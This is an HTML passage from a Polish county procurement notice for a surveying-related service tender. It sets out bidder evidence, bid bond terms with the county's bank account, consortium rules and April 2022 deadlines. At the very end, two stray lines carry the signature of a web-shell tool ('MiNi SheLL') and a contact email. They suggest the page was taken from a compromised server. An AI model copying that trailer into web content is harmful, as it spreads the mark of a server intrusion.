z 2021 r. poz. 1990 z późn. zm.) oraz co najmniej jedna osoba posiadająca doświadczenie obejmujące udział w realizacji co najmniej jednego zamówienia, o którym mowa w pkt 6.2.4 ppkt 1) Zamawiający dopuszcza, aby warunek posiadania uprawnień geodezyjnych oraz udziału w realizacji zamówienia, o którym mowa w pkt 6.2.4 ppkt 1) spełniała ta sama osoba. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">8.2.1 odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>UWAGA:<br/>1) Zgodnie z art. 127 ust. 1 Ustawy, Zamawiający nie wzywa do złożenia podmiotowych środków<br/>dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w<br/>szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał dane umożliwiające<br/>dostęp do tych środków. Z uwagi na powyższe Zamawiający nie wezwie do złożenia dokumentu<br/>określonego w pkt 8.2.1 SWZ, jeżeli będzie mógł go uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych rejestrów, a Wykonawca wskaże w ofercie niezbędne, dane umożliwiające dostęp<br/>do tych dokumentów.<br/>2) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,<br/>zamiast dokumentu, o którym mowa w pkt 8.2.1 SWZ, składa dokument lub dokumenty wystawione w<br/>kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto<br/>jego likwidacji, nie ogłoszono jego upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł<br/>układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w<br/>innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca<br/>wszczęcia tej procedury. Niniejszy dokument powinien być wystawiony nie wcześniej niż 3 miesiące<br/>przed jego złożeniem.<br/>3) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się<br/>dokumentu o którym mowa w pkt 8.2.1 ppkt 2 SWZ, zastępuje się go odpowiednio oświadczeniem<br/>Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, złożone –<br/>odpowiednio: pod przysięgą, przed organem sądowym lub administracyjnym, notariuszem, organem<br/>samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania wykonawcy. Niniejszy dokument powinien być wystawiony nie wcześniej niż 3 miesiące<br/>przed jego złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.2.2	Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane należycie (według wzoru: Załącznik Nr 4 do SWZ – Wykaz usług wykonanych) oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie.<br/>8.2.3	Wykaz osób skierowanych do realizacji zamówienia publicznego – zawierający informacje na temat osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usługi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (według wzoru: Załącznik Nr 5 do SWZ – Wykaz osób skierowanych do realizacji zamówienia publicznego).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W niniejszym postępowaniu Zamawiający nie stawia wymagań w zakresie przedmiotowych<br/>środków dowodowych w celu potwierdzenia zgodności z wymaganiami określonymi w opisie<br/>przedmiotu zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 9.2	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, zgodnie z art. 118 ust. 3 Ustawy, składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca będzie tymi zasobami dysponować.<br/>Przedmiotowy dokument musi potwierdzać, że stosunek łączący Wykonawcę z podmiotem udostępniającym swój zasób gwarantuje do nich rzeczywisty dostęp, w szczególności musi zawierać informacje określone w art. 118 ust. 4 pkt 1-3 Ustawy (według wzoru dokumentu, stanowiącym Załącznik Nr 2 do SWZ).<br/>9.3	Zamawiający ocenia, czy udostępnione Wykonawcy przez podmioty udostępniające zdolności zawodowe pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, a także bada czy nie zachodzą wobec tego podmiotu podstawy wykluczenia.<br/>9.4	Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, przedstawia także (wraz z zobowiązaniem, o którym mowa w pkt 9.2 SWZ) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia (Załącznik Nr 1C do SWZ) tego podmiotu oraz oświadczenie o spełnianiu warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby (Załącznik Nr 1D do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 18.1.	Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 3 400,00 PLN (słownie złotych: trzy tysiące czterysta 100/00).<br/>18.2.	Wadium musi być wniesione przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia terminu związania ofertą.<br/>18.3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>19.3.1.	pieniądzu;<br/>19.3.2.	gwarancjach bankowych;<br/>19.3.3.	gwarancjach ubezpieczeniowych;<br/>19.3.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>18.4.	Wadium w formie pieniądza należy wnieść przelewem na rachunek bankowy Zamawiającego:<br/>Getin Noble Bank S.A.: 06 1560 0013 2226 4983 1000 0003<br/>W tytule przelewu należy wpisać: „Wadium – przetarg nr ZP.272.13.2022”<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>18.5.	W przypadku wnoszenia wadium w formie gwarancji lub poręczenia, o których mowa w pkt SWZ: 18.3.2 – 18.3.4, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej, który powinien zawierać następujące elementy:<br/>a)	nazwę Zleceniodawcy (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (poręczyciela/Wystawcy) oraz wskazanie ich siedzib,<br/>b)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem (np. nazwa zadania, znak postępowania),<br/>c)	kwotę gwarancji/poręczenia,<br/>d)	termin ważności gwarancji/poręczenia (który nie może być krótszy niż termin związania ofertą z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień składania ofert),<br/>e)	treść art. 98 ust. 6 Ustawy, określająca okoliczności zatrzymania wadium przez Zamawiającego,<br/>f)	jednoznaczny zapis o gwarantowaniu wypłaty całej kwoty wadium w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie,<br/>g)	w przypadku oferta zostanie złożona przez podmioty wspólnie ubiegające się o udzielenie zamówienia (np. konsorcjantów) – informację identyfikującą podmioty, których dotyczy zabezpieczenie wadialne oferty.<br/>Brak którejś z powyższych adnotacji w treści dokumentu wadialnego, będzie skutkować odrzuceniem oferty w trybie art. 226 ust. 1 pkt 14 Ustawy, to jest z uwagi na wniesienie wadium w sposób nieprawidłowy.<br/>18.6.	W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego wskazany w punkcie 18.4 SIWZ<br/>18.7.	Okoliczności i zasady zwrotu wadium, jego zatrzymania określa Ustawa. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1	W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia w trybie art. 58 ust. 1 Ustawy (np. Konsorcjum bądź spółka cywilna), ustanawiają oni Pełnomocnika do reprezentowania Wykonawców w postępowaniu albo do reprezentowania i zawarcia umowy, na podstawie art. 58 ust. 2 Ustawy. Pełnomocnictwo powinno być załączone do oferty.<br/>10.2	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu, w zakresie określonym w Rozdziale 7 SWZ. <br/>10.3	Zgodnie z art. 117 ust. 4 Ustawy, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór przedmiotowego oświadczenia stanowi Załącznik Nr 3 do SWZ.<br/>10.4	Wykonawcy wspólnie ubiegający się o udzielenie zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy, zgodnie z art. 445 ust. 1 Ustawy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany postanowień niniejszej umowy mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności:<br/>1.	w przypadku zmian przepisów prawa w okresie obowiązywania umowy, mających wpływ na realizację przedmiotu umowy,<br/>2.	w przypadku następstw siły wyższej, tj. zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia (niemożliwość zapobieżenia nie tyle samemu zjawisku, co jego następstwom), w tym m.in. katastrofa naturalna, katastrofalne działanie przyrody, np. niezwykłe mrozy, strajk, zamieszki uliczne, pożar, powódź, eksplozja, wojna, atak terrorystyczny. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/powiat_tczew</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-25 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 126 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com